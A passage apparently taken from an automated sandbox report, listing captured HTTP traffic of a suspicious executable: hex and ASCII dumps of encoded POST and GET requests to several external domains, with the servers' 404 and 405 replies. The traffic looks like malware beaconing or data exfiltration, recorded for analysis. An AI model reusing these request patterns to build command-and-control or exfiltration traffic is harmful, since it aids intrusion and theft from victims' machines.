32 70 56 54 62 55 48 7a 74 73 68 62 73 75 37 32 4a 71 68 4d 63 67 2b 43 30 5a 78 4e 77 2b 32 62 41 4a 51 4e 38 45 41 35 59 38 31 53 45 32 33 53 73 49 45 36 57 5a 6c 68 66 38 36 78 32 30 6a 34 42 46 54 6a 58 61 2b 49 35 6f 49 32 55 6e 32 38 64 4c 35 4c 6c 30 5a 4e 75 64 52 2f 6d 34 4b 63 6d 77 69 31 36 73 47 74 74 4b 30 6c 42 33 63 4f 79 5a 58 53 72 37 66 74 34 56 70 73 67 58 64 79 5a 33 57 31 69 61 44 6e 63 51 66 76 4e 54 59 5a 30 79 51 38 4c 4a 65 4f 45 54 76 52 49 6e 4c 49 63 43 37 4f 69 4e 48 32 65 6f 56 77 79 30 4e 67 41 48 49 38 34 58 6e 42 51 2f 34 49 51 32 68 45 45 44 6c 33 6a 49 79 44 52 44 42 72 69 66 72 50 48 61 4f 76 49 78 6a 57 69 73 61 45 38 64 63 7a 67 62 49 57 50 72 55 58 55 35 50 7a 31 68 51 5a 45 47 79 6a 6b 73 51 42 41 78 36 61 61 74 44 45 31 59 6a 71 75 44 66 48 39 4c 4a 38 6f 57 43 65 52 6b 42 33 46 34 39 75 56 35 31 2b 73 68 52 6a 49 37 32 6e 46 6b 37 77 54 4b 57 54 4d 63 62 48 7a 77 4e 4a 73 6c 68 71 66 38 44 56 79 58 2f 4f 79 50 44 6c 38 6a 4e 30 36 2f 5a 48 78 69 64 49 61 2b 36 63 71 42 67 75 58 6b 77 56 67 6e 2b 56 4d 49 5a 67 74 54 46 59 54 67 33 57 42 42 68 6d 70 67 67 48 6e 55 77 52 30 76 6c 76 4a 38 66 4d 5a 52 65 44 79 63 2f 69 75 35 61 42 79 2f 55 6d 39 65 73 48 56 63 74 6c 53 31 5a 38 75 6a 58 61 62 43 6a 78 6d 46 6e 59 30 42 4b 39 48 32 2b 4b 6a 59 78 6c 33 6c 4d 42 47 39 30 42 63 43 79 69 30 6c 38 46 75 52 36 34 75 79 4d 71 4c 48 52 76 7a 4f 54 76 41 46 2f 42 50 54 42 4b 65 52 54 6d 44 54 55 51 7a 4d 6b 57 42 38 4c 76 64 52 7a 6b 5a 59 2b 4b 78 4c 5a 5a 35 5a 76 66 79 49 6f 43 57 32 4d 6c 6c 75 76 61 74 54 35 73 35 6f 54 50 48 4b 72 67 32 38 37 49 76 42 4d 6d 65 61 54 77 68 74 7a 57 32 43 4d 6b 64 52 61 5a 46 69 4b 38 5a 5a 55 79 55 46 57 46 44 76 58 63 2b 4c 6e 6f 32 38 57 57 67 67 67 65 4f 64 77 63 4b 6d 49 5a 53 61 75 79 62 4c 44 44 39 65 64 43 55 39 55 36 6b 77 59 56 48 7a 48 43 6b 2f 77 53 4e 52 6c 44 66 62 65 4c 44 7a 78 34 49 79 58 73 58 55 62 6a 68 63 52 6f 2f 78 37 30 51 45 34 50 53 61 66 45 7a 61 72 6f 73 6a 72 55 59 50 63 33 37 59 46 74 79 68 31 51 50 6e 62 51 66 63 42 2f 6b 43 49 38 46 63 2f 5a 30 75 55 67 59 76 43 47 5a 66 4f 70 42 36 66 47 57 2b 68 52 2b 53 57 73 42 51 2b 39 78 44 74 67 6c 46 43 31 4a 63 6d 56 68 31 67 48 61 65 55 53 6d 6d 34 48 5a 75 62 61 49 77 66 67 58 6b 45 32 53 30 63 73 69 4f 68 2b 50 66 50 73 68 61 6b 31 79 61 72 58 39 30 39 59 33 6e 35 2b 70 4d 67 2b 6d 58 2b 71 30 57 34 44 47 6d 34 31 59 38 33 38 59 72 6f 6b 61 52 39 57 47 6e 4d 30 77 5a 7a 30 52
                                                                                                                              Data Ascii: TZd=JtXC+Nr60HwPAm/xSDH1p6DlXp38I0glcJeIq+d44qythwjMr8COt42xTpkfi172pdy/gY6k7LHPJE7p3Vu8qtkiodQaMq6QHFTzua9F2tRvn3rPf48gs59PD1rOze9oKBzZlZ79bTzwUf4JJrY0yjqttrSPr9nr6I+e2WOAd6DeugHI0yzpvoDBnre1OBblWDbLnbE+k5UP7NeUngEI/TLjNcEkehl4mig+ru88xV0eCLGaUodkvOdh2UObUoHGwtnYnhPZOw+9+0VsEfCLWIqrkEcbJhuYW3W0+v6t2VywdEqUnZnJRqXdv+G1tOynTWMRs4WeA4pCEUxsA67694swA4QeOrfKPlkVpvKlIKe6CL414fnMyME/0LOqwsAsGka2HSk8xz+eSvhUhNJy3vCRpWZz5qoIWjeSi8l6ZKo+gVmeivaHTg63FrE79TiwA7FHImCHHGv9LEilok5eAiWT+cHqwKJ4jVavQkF6YxI/xa2kgSWUXw93xKvz03VtBhbVPoQNkigxnCe1rxnpFZBORp2pVTbUHztshbsu72JqhMcg+C0ZxNw+2bAJQN8EA5Y81SE23SsIE6WZlhf86x20j4BFTjXa+I5oI2Un28dL5Ll0ZNudR/m4Kcmwi16sGttK0lB3cOyZXSr7ft4VpsgXdyZ3W1iaDncQfvNTYZ0yQ8LJeOETvRInLIcC7OiNH2eoVwy0NgAHI84XnBQ/4IQ2hEEDl3jIyDRDBrifrPHaOvIxjWisaE8dczgbIWPrUXU5Pz1hQZEGyjksQBAx6aatDE1YjquDfH9LJ8oWCeRkB3F49uV51+shRjI72nFk7wTKWTMcbHzwNJslhqf8DVyX/OyPDl8jN06/ZHxidIa+6cqBguXkwVgn+VMIZgtTFYTg3WBBhmpggHnUwR0vlvJ8fMZReDyc/iu5aBy/Um9esHVctlS1Z8ujXabCjxmFnY0BK9H2+KjYxl3lMBG90BcCyi0l8FuR64uyMqLHRvzOTvAF/BPTBKeRTmDTUQzMkWB8LvdRzkZY+KxLZZ5ZvfyIoCW2MlluvatT5s5oTPHKrg287IvBMmeaTwhtzW2CMkdRaZFiK8ZZUyUFWFDvXc+Lno28WWgggeOdwcKmIZSauybLDD9edCU9U6kwYVHzHCk/wSNRlDfbeLDzx4IyXsXUbjhcRo/x70QE4PSafEzarosjrUYPc37YFtyh1QPnbQfcB/kCI8Fc/Z0uUgYvCGZfOpB6fGW+hR+SWsBQ+9xDtglFC1JcmVh1gHaeUSmm4HZubaIwfgXkE2S0csiOh+PfPshak1yarX909Y3n5+pMg+mX+q0W4DGm41Y838YrokaR9WGnM0wZz0Rw5EABL2Rr1TcJ74VKIG2fpn7meWMREvK737g1kiDmJ83CcMfHGljwbk1Buo+SHVAwU3I+R4dXti45o4WirmWJG9Iy1RuEuS7n6Er1Ra6Y63OIp2+i6EG9KyuQD32FLfOwWiglVRctRO9ktdwqWCvGayeIK5Iuo57o7LDU+zdnFzoWk97mJHzRNY3jDNLhP7DVtLtN6/mye8OR9gUveQknjtoWnwGPeODGWKIp2CmEv5Gp0/5Fs0syBsvmVX1vPvLnEWICtCZShYbyhhhzODYRfIDqwwxTszyx5U8Ir+T22tC7V3ygk7tQsGjOa21Vv93L66YIjlxaeWHKAiRSkfsnoQtbgCDtioD57JtlGkdrj47AGltv88T4MHWoKThZuIjoWJlcIZgAwyOVpU95WC9dfqZhFVEt1BlAbDN/QiSiWehnEkvTLkHXjtk7alxk7CO4CRSCxbYxpk1h/fw87gJPDHQnIC5gt6JTFi4SMyn9B1jdhtEp4IfVWjpGiYSI6QAgfJw+1fm6d48kzcM9la677GmJrrfY7OVmTOB20KLjsTNXVucM+ecomXXR6YZqxOW1hx04zVPb8V2qCaq2mb18x8qkUO1FAenrxL4+jsTcpW1I4aGkXbVGCw1xnjyhzocDK/V3OGzZbXB67uUvFYWlstzRT8Ks5yOvIlM2UpktY8PhpKUi3LxXug9QWqhSKGT+a8qpQtNIktyiMb0bLbIg6E8BEKbw5eWHnx7OnyQk0Q9zbQszquWhNr6T2vS8WxYVIm9POrRac+XZzrKx8J+DjiTdJetIKQi2acpPGjNTsXzDrKYoQNaRYSm567qPIP7sDLimQh2m+NsoB/6+xWwqtHyoKaTc2ooEvAtYnkd6F2yNVvqsRYacJ/0dC2romnO8OOhgYslzY3MyF8+5RM9MrVSMYUWDBSyQHYFW7F2LrIJMh94ORRj2vbILqqzcGf/nMg6CQlJ6F1j9hSVtdmXAnj9aHUDb9oPV4hglJYQfNfn/QOtN8vhZI2HID5onaCCxx/LNR6kAtcCSxqeLS8HRWM7Glxh3t5yWwaw8wmr9w3uCnM2Dlww+UGd1gJuuxnYEF/why4MFmKhliC1BTsQp/Sm/XRtdzm437cBcCFgJMmig9pP9Z15tti4A11H+6nNDiflu0rbxPX88paXXn0jmCficgRiozVpRte395Q/fc6wtTS9MGQNYUHKEFNU94tJ4u1B7NxTCqDTJj5jDPejkmxH2pN+8zrckQVawUTYEIz38oIY4TF7atyaSJMfGhNjB1HtlLOek2ASCtw04mJ/4CDvksr4mBhewGYrSUSVSXwGP5sQY7cYbZFhvhnTJjR+VjmI35lFPLQ8QWmTIjJfLvWLRX7uGeawQQYHZum6qSGCKN5bXdZi297eLLcby2oWKja+3amc6NYXI8TNAPGsAkobiiiME4iubUonou62SRXGdibsX2XDE0XTfEN3AgaNuFQj/hpEb7MSAx0Xm1AudcNZhBHCuHr8yJ3U3roRIMCIdnWIj7wVs+YHHwLyP/bCzEi057/2ZWfidu8pwbDulK7DXVsGd8iGbkronPrAzEbcs71keGEGbUdh5h/XbiKhyBPj9xtVsx4QxOxZZZ2nv4Hl6IEFh457YtXws5xy5TwkD+Ch26uQp7S5dE76c52oTf/8j6uCUfJcFE2fT9PSyrqM4E97h+qCG8Y8Cyp399TfpggKrnLdtorggi8Bhe347D9CVNccc+sQ8qkD+CYc8+/8WD1Xcg4t6M3LJwL9jLDGjEcJTzQ1j1RXZu3VKaZfQRtKKAH2ZFiPJpoSLzPgOPKwp6+E12ij5FsRfbkVYRIHpdu6i7/LBzcN5d1wlJNKXZfy5fnB9P7KvJnCZ1z+kJBZmeAQljHgFdeGF08NFwFbWWEOADdjP3eOQgBvMDGsdVp/kuE884/dJ+iK4rusMdrYxmw2VRgLDXtigZmlM2jcI0yEHMhH1ofTQK8mrRwgr9s7CgDyxFih3Zupz/xvuYck+JiD2o5+Ykpg+QCtavw7P/Je513z84vXC7xsiFGcQzVzsS6lnIsX37vpqN6DG2Ky5RquvG1OQwhbg3o+0feImZI95u+74whgEqeZhs/F7JcL4tOqr/2MpcEBfJvNpl7Tlm4a7yKHSaplMs3H+axAxz7sQqywMKzUlJM90mpMBOs7qThqFymvQdHToMvR7iDAVZ3cmAGQOSCgZeQ1v3I09jwgM4kMGu++x4fLurTEccD/5Z61S4kRJ2VA1C/jAWQO9ufDCQ0xgj7GBvOhMf43hm59YFAFuMITKfeJlqHLRI0ka2up8SFtRw69E4KaRdzslCSrKgtzvJSMcXxL4abVRYla2D0D6cPXhiWau88EfBq7d/TJtUeY8LOwL3JJrZGfFN6wVaEInBfKJG8ryjNAJFFtey7IKpoyaGqvo9DvCuBiGSB8UgQ22+YFPzDRmI9KOYovZivF3IBlGamhQdIMFodXZKlEscUKhzMVPgHcJiFFnBRFfbX0TS1QeovFlkHIoQTgekrGs3f2ZMtXH4wMGkU2sYqWV0OhRK5ktIfCC0cBZKFE2jOnJQb7ygAy8/LwAyldngQD4ewWb1Qvvdh99i4D7Wp+zJgBEqM9vgACjjVRqfoKf6vnIrd7ESwC+RHE2EAmCnrDia02/FDweNmpYQRC0XLw5cx8r63bbUHz1IhFzNnZTiHhaCYSdkF9/I6E/KNODdg8yEv
                                                                                                                              Dec 4, 2023 15:28:44.868405104 CET2626OUTData Raw: 5a 32 4a 53 51 66 4a 72 79 51 34 41 2f 74 66 53 30 31 32 74 4d 5a 70 62 4b 32 52 4c 6c 35 78 79 57 6e 32 42 51 65 79 58 42 52 53 61 78 7a 52 52 43 34 50 71 53 30 55 4d 73 75 69 57 47 4a 74 67 76 42 6d 4b 2f 58 30 35 57 4e 32 32 59 52 41 4c 51 75
                                                                                                                              Data Ascii: Z2JSQfJryQ4A/tfS012tMZpbK2RLl5xyWn2BQeyXBRSaxzRRC4PqS0UMsuiWGJtgvBmK/X05WN22YRALQuskqHUdwdAfkHOSEcH6MsHmjWKKzKPMFzk3CAdE2k0YQXTlIDMQc5Ij3jO77Bmvp2vKMRi2i/+vvWBWnnant4OQL3D08X4vwT643T28wWDK7ICAHZtAswM3F02PvAiUu9FO91IXdyMAMyEaZJ5ZEB0Cu8pRhq8Erah
                                                                                                                              Dec 4, 2023 15:28:44.868573904 CET6484OUTData Raw: 58 71 57 47 45 65 78 44 31 78 47 6a 34 62 6b 68 4d 31 30 75 53 43 6d 53 39 6d 56 33 38 55 62 38 62 30 30 63 6a 34 53 6a 65 5a 6a 76 33 6c 4d 76 4d 50 55 32 34 6c 6b 46 72 72 52 4b 47 73 46 41 6c 53 42 5a 4e 59 32 54 6f 79 5a 73 59 47 76 36 73 7a
                                                                                                                              Data Ascii: XqWGEexD1xGj4bkhM10uSCmS9mV38Ub8b00cj4SjeZjv3lMvMPU24lkFrrRKGsFAlSBZNY2ToyZsYGv6szkhNYet/IUsioAHiCrbMm9cDMo98PItkmbcJAT8/8S8S39M4Kw1+dyRbSlyxbC+J3Rr7hNtrRJiBzrBPHiolTk0uVVYC0fUq502GOAHDiuWdPWnJuXn1OJgTQN5T6k8M7rIc53KdosC0p8TdWRVH0F9o7hmfc9Nzsp
                                                                                                                              Dec 4, 2023 15:28:44.868745089 CET6484OUTData Raw: 74 6b 72 39 38 42 6b 75 35 59 33 74 43 6f 61 66 59 64 68 4a 4f 45 34 76 71 7a 4a 33 44 37 78 4b 44 53 59 6b 55 45 76 79 51 77 38 63 54 66 39 4a 41 74 75 76 41 35 62 52 4f 49 4a 64 45 31 46 36 4c 64 71 4b 39 59 32 7a 4f 4c 74 4b 7a 74 50 71 6e 38
                                                                                                                              Data Ascii: tkr98Bku5Y3tCoafYdhJOE4vqzJ3D7xKDSYkUEvyQw8cTf9JAtuvA5bROIJdE1F6LdqK9Y2zOLtKztPqn8VMcp4lW/kfF6zhuV+6IGpSIEt9eLoy9PykhMkFIhpCjhSwWRofST/o1Q6Earu7nTHvB1oa+sKpMyMMLrmiW0wh3IihX8n4t6RratAARTMV4BEJnA+C3qE73inGQOxjvl0f5uvKaBTnlFdqRV2siZC6riBuNNDNgFD
                                                                                                                              Dec 4, 2023 15:28:44.868912935 CET5198OUTData Raw: 6b 31 6d 39 76 44 55 69 35 58 43 64 59 6e 77 4a 6c 37 77 6d 4d 4e 6b 2f 4c 55 48 46 5a 75 6b 6d 32 2f 57 74 51 6a 66 4c 63 55 6f 36 4b 6c 75 54 2b 41 4a 74 50 6f 39 77 79 44 39 7a 74 30 36 65 48 42 38 6d 52 38 35 67 36 43 68 2f 38 32 36 76 6e 30
                                                                                                                              Data Ascii: k1m9vDUi5XCdYnwJl7wmMNk/LUHFZukm2/WtQjfLcUo6KluT+AJtPo9wyD9zt06eHB8mR85g6Ch/826vn06vAvBRxUCnfL/EZmX6KaHjzDwm2zprs9FTKIImRJb4r/50DYYuMp8PFCHAIZbqXkCbiEBVRvf08VouQ7oDzTBddR9TgOXjdjQsUe3DCqGC+y8XtWeqJduwjbP54Cd/gmR4GU3kDGh4p2RgokaBEuABJauyupFe5F8
                                                                                                                              Dec 4, 2023 15:28:44.869080067 CET5198OUTData Raw: 59 65 62 45 4f 41 67 2b 48 78 4b 2f 2f 47 77 50 68 5a 6a 57 44 4c 7a 59 33 44 48 38 39 66 72 70 72 4a 71 57 30 42 50 37 64 58 39 79 57 6e 74 57 45 39 6c 34 70 5a 61 5a 77 76 6e 68 50 46 54 6f 66 63 55 6c 4d 6b 42 4c 66 6d 2f 67 41 2f 45 57 4d 6d
                                                                                                                              Data Ascii: YebEOAg+HxK//GwPhZjWDLzY3DH89frprJqW0BP7dX9yWntWE9l4pZaZwvnhPFTofcUlMkBLfm/gA/EWMmfdXW8dIsn9zZOlufGSnYIVb3t+/JZR+rh1358KEdKV26DeuZzCklymXjSDR9MvHwg4vUuVth5/H1CYZD5l0hBvjfX4rSjIEeNXWOv3gGHOPK1Mwxzqb56v1aL6TyYSyJK2q+ZI442EM9/AjuG1s9zeSBbaBJy9Itt
                                                                                                                              Dec 4, 2023 15:28:45.045654058 CET2626OUTData Raw: 54 37 72 50 53 4e 67 59 76 50 34 41 52 4b 43 48 2b 44 34 74 37 6d 66 6c 4a 78 64 44 67 59 34 50 37 58 56 6e 30 65 47 4c 34 57 72 37 47 41 4a 58 30 39 47 59 36 6a 35 6a 4a 59 41 6d 61 55 42 52 4b 4e 4b 6c 72 46 4e 53 51 50 54 77 38 45 34 69 53 30
                                                                                                                              Data Ascii: T7rPSNgYvP4ARKCH+D4t7mflJxdDgY4P7XVn0eGL4Wr7GAJX09GY6j5jJYAmaUBRKNKlrFNSQPTw8E4iS0Bahg8ceMqYfgjHO78yTJS6QaN72/b2VxPdWi3TSeiJL7lOKoKsF6i1G573Rfy/FjiVGrsKms9HSGDBSCv5SDYCJYy25zfqjsR6SHAh7UQhWbF14ilcHodh7fyDYqQZ+hIMnJ1QNklpJu8/6VasPe9Q+EpPnDPUfWs
                                                                                                                              Dec 4, 2023 15:28:45.045805931 CET5198OUTData Raw: 79 66 57 4f 6f 50 7a 52 64 50 49 2f 4b 73 33 6a 4a 69 78 4d 74 41 2b 4b 38 31 54 7a 56 6d 64 57 49 43 77 73 57 43 6e 79 4a 64 48 6e 74 65 4e 48 77 4b 41 55 52 6c 77 76 4c 63 64 59 47 44 4d 77 4f 44 63 4e 79 6b 50 48 30 55 53 66 78 65 36 6e 6a 6b
                                                                                                                              Data Ascii: yfWOoPzRdPI/Ks3jJixMtA+K81TzVmdWICwsWCnyJdHnteNHwKAURlwvLcdYGDMwODcNykPH0USfxe6njkzozhpvxQvC3JOlPQhkeK+djPGLqtInpy/z3RAszl9tF+5RIxEwFf5W6elbM8kcFdsiYrzpEjklG/3g/ZDyczVn9cGD5NH/HipyoKrybzrUE1FFb43IuqQgQBmqwx44sd8HvOmi3x2v7AtJs4KZ2M+XYjzaoqcPoGe
                                                                                                                              Dec 4, 2023 15:28:45.045979023 CET3912OUTData Raw: 6c 41 61 31 51 34 6f 59 4d 33 59 58 7a 36 4f 6d 36 57 70 6e 4f 61 79 53 7a 74 64 30 37 35 4a 58 36 4b 76 50 4c 6f 79 32 50 77 43 48 4d 4d 59 66 6b 64 57 58 6b 67 54 65 76 59 5a 78 77 59 5a 6c 6c 33 30 7a 59 33 71 75 65 31 65 36 44 6b 64 53 53 53
                                                                                                                              Data Ascii: lAa1Q4oYM3YXz6Om6WpnOaySztd075JX6KvPLoy2PwCHMMYfkdWXkgTevYZxwYZll30zY3que1e6DkdSSSxqeb/ELVVVBCJM7aROlL8O6bayTYNE+EK0sk9Qg8JFFvttn+/zDSfrF1zuzL+HgcHRHFGXKsXUMuXyNERCdhaoTvPZd0URQS2z4N3qKb5QAhgoDXFZZ3Mo7x/m8x5UXL9jLVEEWXmn4jYtn1IBnrfxmKHYnlSzNv5
                                                                                                                              Dec 4, 2023 15:28:45.046143055 CET1340OUTData Raw: 59 4b 77 76 51 51 69 2b 4a 56 6f 7a 58 4d 77 33 45 36 39 35 72 31 4e 50 6d 73 6b 41 4a 58 71 54 32 39 42 59 4a 38 67 68 70 47 47 5a 39 66 57 54 57 78 46 4e 4e 64 70 6d 62 44 73 67 79 65 39 33 72 46 45 45 72 7a 6f 61 4e 58 43 68 53 72 6c 32 32 68
                                                                                                                              Data Ascii: YKwvQQi+JVozXMw3E695r1NPmskAJXqT29BYJ8ghpGGZ9fWTWxFNNdpmbDsgye93rFEErzoaNXChSrl22h2R25F4eyd3m/iPduzRVtpZGDzN/2WTdWLm276pbOh4atxqvJYNVQdKF2KOw0AcqU5NJakmNx4LHK+7vP0Yjcr7GZlxJ/hBf5L6fTIs1V9NbfBcqN/yh5yTt9rJTGVYvQSKz9vS7bTfhNFO99sruvLNw6nTeL1Zna2
                                                                                                                              Dec 4, 2023 15:28:45.046314001 CET2124OUTData Raw: 58 79 6d 34 71 6e 51 42 6c 51 43 71 30 73 71 4a 7a 2b 6c 6d 68 4a 30 2f 55 6d 58 6c 59 55 6f 61 41 6d 54 6a 42 36 51 73 68 42 55 58 58 36 5a 4c 6e 43 4f 4f 79 55 4c 54 73 4f 58 63 59 79 68 66 2b 54 66 61 69 63 69 31 56 64 2f 70 77 69 4a 48 6b 57
                                                                                                                              Data Ascii: Xym4qnQBlQCq0sqJz+lmhJ0/UmXlYUoaAmTjB6QshBUXX6ZLnCOOyULTsOXcYyhf+Tfaici1Vd/pwiJHkWuNQpkriWpmMKMNAlXkbal+OHPJsQMEDedMqNtyhGubssI6VZwMKZdMw7P83Q8eo+bkDCbcP3+4vPhuisi37id6cs7KTda+4KGC/d4eptYyn5x+NgY2OEWjPvGEI9IHmKOmL2/ZoIbORHamiDCzmNBbvgCL9pTG9PD
                                                                                                                              Dec 4, 2023 15:28:45.223275900 CET554INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:44 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              97192.168.11.205022891.184.0.200808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:47.395925999 CET546OUTGET /3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:28:47.574867964 CET554INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:47 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              98192.168.11.205022991.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:52.772299051 CET819OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 67 4c 45 68 75 53 71 34 50 39 53 4e 77 78 2f 49 56 4d 63 55 42 57 4f 55 66 7a 49 4a 55 73 77 6b 52 61 63 6f 74 51 6e 53 4d 65 48 31 74 6f 77 30 4b 4f 67 53 47 68 6b 4a 39 49 64 57 41 63 50 31 69 6a 52 44 52 53 78 58 42 47 45 79 68 35 39 38 5a 61 69 59 49 31 53 79 5a 39 68 48 37 31 6f 61 6c 63 4d 34 6d 70 44 32 6a 38 39 77 4b 75 76 71 4c 32 6a 56 75 55 44 4a 79 6d 44 47 34 53 73 4e 6e 65 33 50 2f 2f 51 4d 67 4d 67 38 34 45 6f 51 44 49 57 33 54 5a 4d 46 66 55 63 76 72 43 32 73 4b 6e 51 39 68 37 70 46 69 2b 75 32 57 2b 76 43 41 3d 3d
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SNwx/IVMcUBWOUfzIJUswkRacotQnSMeH1tow0KOgSGhkJ9IdWAcP1ijRDRSxXBGEyh598ZaiYI1SyZ9hH71oalcM4mpD2j89wKuvqL2jVuUDJymDG4SsNne3P//QMgMg84EoQDIW3TZMFfUcvrC2sKnQ9h7pFi+u2W+vCA==
                                                                                                                              Dec 4, 2023 15:28:52.954888105 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:52 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              99192.168.11.205023091.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:55.475392103 CET1159OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
